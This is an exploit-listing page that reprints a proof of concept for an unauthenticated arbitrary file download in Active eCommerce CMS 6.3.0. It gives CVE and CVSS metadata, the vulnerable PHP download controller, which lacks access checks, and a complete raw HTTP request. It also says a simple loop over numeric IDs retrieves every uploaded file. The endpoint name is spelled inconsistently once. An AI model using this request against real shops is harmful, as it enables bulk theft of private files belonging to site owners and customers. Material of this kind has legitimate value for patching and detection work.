Advertisement






Active eCommerce CMS 6.3.0 Arbitrary File Download

CVE Category Price Severity
CVE-2021-42006 CWE-22 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-09-28
CPE
cpe:cpe:/a:active-ecommerce-cms:active-ecommerce-cms:6.3.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090081

Below is a copy:

Active eCommerce CMS 6.3.0 Arbitrary File Download
# Exploit Title: Active eCommerce CMS Arbitrary File Download
# Exploit Author: th3d1gger
# Vendor Homepage: https://codecanyon.net
# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405
# Version: Version 6.3.0
# Tested on Ubuntu 18.04

without authentication with for loop user can download all files on the website with numeric ids.

/aiz-uploadder/download/{id}

<--Vulnerable source code-->
public function attachment_download($id)
    {
        $project_attachment = Upload::find($id);
        try{
           $file_path = public_path($project_attachment->file_name);
            return Response::download($file_path);
        }catch(\Exception $e){
            flash(translate('File does not exist!'))->error();
            return back();
        }

    }

-------Request-----------


GET /aiz-uploader/download/3 HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
sec-ch-ua-platform: "Linux"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663797922828%7D; TawkConnectionTime=0; XSRF-TOKEN=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB; active_ecommerce_cms_session=zQGudzxBZLEDymY6TvM4yDEKrxTAQJ7FAVIAQEBU
Connection: close

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.